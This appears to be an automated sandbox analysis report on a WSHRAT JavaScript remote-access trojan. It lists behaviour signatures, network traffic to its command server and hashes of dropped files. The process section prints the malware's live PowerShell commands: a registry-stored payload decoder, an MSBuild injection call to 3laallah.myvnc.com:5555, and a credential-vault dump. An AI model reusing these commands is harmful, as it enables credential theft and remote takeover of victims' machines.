Analysis Overview
SHA256
f9490f2e724d5ca5edd30a552f09f27b59b608361143e95edcc3ef860958ea5e
Threat Level: Known bad
The file ID-92164.js was found to be: Known bad.
Malicious Activity Summary
WSHRAT
Executes dropped EXE
Blocklisted process makes network request
Reads user/profile data of web browsers
Loads dropped DLL
Looks up external IP address via web service
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Script User-Agent
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
Kills process with taskkill
Runs .reg file with regedit
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-10-14 10:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-10-14 10:12
Reported
2021-10-14 10:15
Platform
win7v20210408
Max time kernel
151s
Max time network
181s
Command Line
Signatures
WSHRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js
C:\Windows\regedit.exe
"regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 3laallah.myvnc.com | udp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
| FR | 54.38.124.52:5555 | 3laallah.myvnc.com | tcp |
Files
memory/1176-60-0x0000000000000000-mapping.dmp
memory/1176-61-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp
memory/1176-62-0x0000000000410000-0x0000000000411000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg
| MD5 | 0e5411d7ecba9a435afda71c6c39d8fd |
| SHA1 | 2d6812052bf7be1b5e213e1d813ae39faa07284c |
| SHA256 | cb68d50df5817e51ec5b2f72893dc4c749bf3504519107e0a78dda84d55f09e2 |
| SHA512 | 903ac6e5c8a12607af267b54bcbbedfa5542c5b4f7ea289ab7c6a32a424d5b846ae406d830cb4ad48e2b46f92c504163c0856af8c3e09685a8855f39f616ddb1 |
memory/1640-64-0x0000000000000000-mapping.dmp
memory/1640-66-0x0000000002410000-0x0000000002411000-memory.dmp
memory/1640-67-0x000000001AB10000-0x000000001AB11000-memory.dmp
memory/1640-68-0x00000000025F0000-0x00000000025F1000-memory.dmp
memory/1640-69-0x000000001AA90000-0x000000001AA92000-memory.dmp
memory/1640-70-0x000000001AA94000-0x000000001AA96000-memory.dmp
memory/1640-71-0x0000000002370000-0x0000000002371000-memory.dmp
memory/1640-72-0x000000001B480000-0x000000001B481000-memory.dmp
memory/1640-73-0x000000001B7E0000-0x000000001B7E1000-memory.dmp
memory/856-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 834b6acdaf59c99163175f8e81160980 |
| SHA1 | a4630c64470bf044e2f9b152555580cc6a2e2acf |
| SHA256 | 5221cedc6bb4bd856e580d0f26b9a0cc93588369dc3fe3d5c0dd2fada36fbe68 |
| SHA512 | 58eb8356a1bd5b0f2dcae8fbff6db44ade2c5ddc5ba77f4bc1886193e7071e4fc02fc0fc84dd07b8132df74478ea0daa635283c450d6a20cd3c85433e16de535 |
memory/856-77-0x0000000002380000-0x0000000002381000-memory.dmp
memory/856-78-0x000000001AC60000-0x000000001AC61000-memory.dmp
memory/856-79-0x00000000023C0000-0x00000000023C1000-memory.dmp
memory/856-80-0x00000000022E0000-0x00000000022E1000-memory.dmp
memory/856-81-0x000000001ABE0000-0x000000001ABE2000-memory.dmp
memory/856-82-0x000000001ABE4000-0x000000001ABE6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | c686a05bd759c013d1808ba6ab636ce8 |
| SHA1 | 3762da5f346f23a7179a5f950f3debb8a04444f5 |
| SHA256 | 6e30881535c970485699c5a7ec21d5dd150f70333a536c0632ef304fbd0223fc |
| SHA512 | 9d458c80d1bd27d4d7aa8a9bdc9a138b5d2d7b030fb89c7c923da44c0a53aae928895651500dc4fd88a560e6725923ec20514818b98c365b24ec9ce32be393fa |
memory/856-84-0x000000001B700000-0x000000001B701000-memory.dmp
memory/856-85-0x000000001C160000-0x000000001C161000-memory.dmp
memory/1680-86-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 834b6acdaf59c99163175f8e81160980 |
| SHA1 | a4630c64470bf044e2f9b152555580cc6a2e2acf |
| SHA256 | 5221cedc6bb4bd856e580d0f26b9a0cc93588369dc3fe3d5c0dd2fada36fbe68 |
| SHA512 | 58eb8356a1bd5b0f2dcae8fbff6db44ade2c5ddc5ba77f4bc1886193e7071e4fc02fc0fc84dd07b8132df74478ea0daa635283c450d6a20cd3c85433e16de535 |
memory/1680-93-0x000000001ABE0000-0x000000001ABE2000-memory.dmp
memory/1680-94-0x000000001ABE4000-0x000000001ABE6000-memory.dmp
memory/1680-96-0x0000000002400000-0x0000000002403000-memory.dmp
memory/988-97-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 834b6acdaf59c99163175f8e81160980 |
| SHA1 | a4630c64470bf044e2f9b152555580cc6a2e2acf |
| SHA256 | 5221cedc6bb4bd856e580d0f26b9a0cc93588369dc3fe3d5c0dd2fada36fbe68 |
| SHA512 | 58eb8356a1bd5b0f2dcae8fbff6db44ade2c5ddc5ba77f4bc1886193e7071e4fc02fc0fc84dd07b8132df74478ea0daa635283c450d6a20cd3c85433e16de535 |
memory/988-100-0x0000000002240000-0x0000000002241000-memory.dmp
memory/988-102-0x000000001AC20000-0x000000001AC22000-memory.dmp
memory/988-103-0x000000001AC24000-0x000000001AC26000-memory.dmp
memory/988-104-0x0000000001EC0000-0x0000000001EC1000-memory.dmp
memory/988-105-0x0000000002470000-0x0000000002471000-memory.dmp
memory/988-106-0x000000001B850000-0x000000001B851000-memory.dmp
memory/1072-107-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
| MD5 | e03cbf90f6ed0c8075e5092621555990 |
| SHA1 | 18ced6a9659a87b7d1458cdb6ce8409219299fc1 |
| SHA256 | 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9 |
| SHA512 | f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d |
memory/1708-109-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
| MD5 | e03cbf90f6ed0c8075e5092621555990 |
| SHA1 | 18ced6a9659a87b7d1458cdb6ce8409219299fc1 |
| SHA256 | 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9 |
| SHA512 | f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d |
C:\Users\Admin\AppData\Local\Temp\wshsdk\python37.dll
| MD5 | 7f0b34248c228bebc731ef155b50bbff |
| SHA1 | 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44 |
| SHA256 | 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578 |
| SHA512 | fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23 |
\Users\Admin\AppData\Local\Temp\wshsdk\python37.dll
| MD5 | 7f0b34248c228bebc731ef155b50bbff |
| SHA1 | 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44 |
| SHA256 | 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578 |
| SHA512 | fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\VCRUNTIME140.dll
| MD5 | ae96651cfbd18991d186a029cbecb30c |
| SHA1 | 18df8af1022b5cb188e3ee98ac5b4da24ac9c526 |
| SHA256 | 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1 |
| SHA512 | 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7 |
\Users\Admin\AppData\Local\Temp\wshsdk\vcruntime140.dll
| MD5 | ae96651cfbd18991d186a029cbecb30c |
| SHA1 | 18df8af1022b5cb188e3ee98ac5b4da24ac9c526 |
| SHA256 | 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1 |
| SHA512 | 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\ucrtbase.DLL
| MD5 | d6326267ae77655f312d2287903db4d3 |
| SHA1 | 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f |
| SHA256 | 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9 |
| SHA512 | 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 41a348f9bedc8681fb30fa78e45edb24 |
| SHA1 | 66e76c0574a549f293323dd6f863a8a5b54f3f9b |
| SHA256 | c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b |
| SHA512 | 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 41a348f9bedc8681fb30fa78e45edb24 |
| SHA1 | 66e76c0574a549f293323dd6f863a8a5b54f3f9b |
| SHA256 | c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b |
| SHA512 | 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-localization-l1-2-0.dll
| MD5 | eff11130bfe0d9c90c0026bf2fb219ae |
| SHA1 | cf4c89a6e46090d3d8feeb9eb697aea8a26e4088 |
| SHA256 | 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97 |
| SHA512 | 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 0d1aa99ed8069ba73cfd74b0fddc7b3a |
| SHA1 | ba1f5384072df8af5743f81fd02c98773b5ed147 |
| SHA256 | 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1 |
| SHA512 | 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 93d3da06bf894f4fa21007bee06b5e7d |
| SHA1 | 1e47230a7ebcfaf643087a1929a385e0d554ad15 |
| SHA256 | f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d |
| SHA512 | 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 93d3da06bf894f4fa21007bee06b5e7d |
| SHA1 | 1e47230a7ebcfaf643087a1929a385e0d554ad15 |
| SHA256 | f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d |
| SHA512 | 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | aec2268601470050e62cb8066dd41a59 |
| SHA1 | 363ed259905442c4e3b89901bfd8a43b96bf25e4 |
| SHA256 | 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2 |
| SHA512 | 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | aec2268601470050e62cb8066dd41a59 |
| SHA1 | 363ed259905442c4e3b89901bfd8a43b96bf25e4 |
| SHA256 | 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2 |
| SHA512 | 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 6ea692f862bdeb446e649e4b2893e36f |
| SHA1 | 84fceae03d28ff1907048acee7eae7e45baaf2bd |
| SHA256 | 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2 |
| SHA512 | 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 6ea692f862bdeb446e649e4b2893e36f |
| SHA1 | 84fceae03d28ff1907048acee7eae7e45baaf2bd |
| SHA256 | 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2 |
| SHA512 | 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 8d02dd4c29bd490e672d271700511371 |
| SHA1 | f3035a756e2e963764912c6b432e74615ae07011 |
| SHA256 | c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b |
| SHA512 | d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 8d02dd4c29bd490e672d271700511371 |
| SHA1 | f3035a756e2e963764912c6b432e74615ae07011 |
| SHA256 | c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b |
| SHA512 | d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | ac290dad7cb4ca2d93516580452eda1c |
| SHA1 | fa949453557d0049d723f9615e4f390010520eda |
| SHA256 | c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382 |
